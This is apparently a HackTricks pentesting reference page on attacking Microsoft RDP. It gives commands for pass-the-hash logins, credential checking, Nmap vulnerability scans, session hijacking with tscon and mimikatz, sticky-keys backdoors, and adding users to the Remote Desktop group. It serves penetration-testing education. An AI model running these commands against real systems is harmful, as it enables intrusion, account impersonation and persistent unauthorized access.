HackTricks
Search…
Pentesting
3389 - Pentesting RDP

Basic Information

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).
Default port: 3389
1
PORT STATE SERVICE
2
3389/tcp open ms-wbt-server
Copied!

Connect with known credentials/hash

1
rdesktop -u <username> <IP>
2
rdesktop -d <domain> -u <username> -p <password> <IP>
3
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
4
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>
Copied!
Be careful, you could lock accounts

Check known credentials against RDP services

rdp_check.py from impacket let you check if some credentials are valid for a RDP service:
1
rdp_check <domain>/<name>:<password>@<IP>
Copied!

Nmap scripts

1
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
Copied!
It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).

Post-Exploitation

JoelGMSec/AutoRDPwn
GitHub

Launch CMD with other cretentials so they are used in the network

You can launch a new cmd to wich new credentials will be attached so, every interaction this new shell makes with the network will use the new credentials:
1
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted
Copied!

Session stealing

With Administrator rights you can access any opened RDP session by any user without need to know the password of the owner.
Get openned sessions:
1
query user
Copied!
Access to the selected session
1
tscon <ID> /dest:<SESSIONNAME>
Copied!
Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
Important: When you access an active RDP sessions you will kickoff the user that was using it.
You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)

Mimikatz

You could also use mimikatz to do this:
1
ts::sessions #Get sessions
2
ts::remote /id:2 #Connect to the session
Copied!

Sticky-keys & Utilman

Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime
You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

Adding User to RDP group

1
net localgroup "Remote Desktop Users" UserLoginName /add
Copied!

HackTricks Automatic Commands

1
Protocol_Name: RDP #Protocol Abbreviation if there is one.
2
Port_Number: 3389 #Comma separated if there is more than one.
3
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
4
5
Entry_1:
6
Name: Notes
7
Description: Notes for RDP
8
Note: |
9
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software
10
11
https://book.hacktricks.xyz/pentesting/pentesting-rdp
12
13
Entry_2:
14
Name: Nmap
15
Description: Nmap with RDP Scripts
16
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
Copied!
Last modified 5mo ago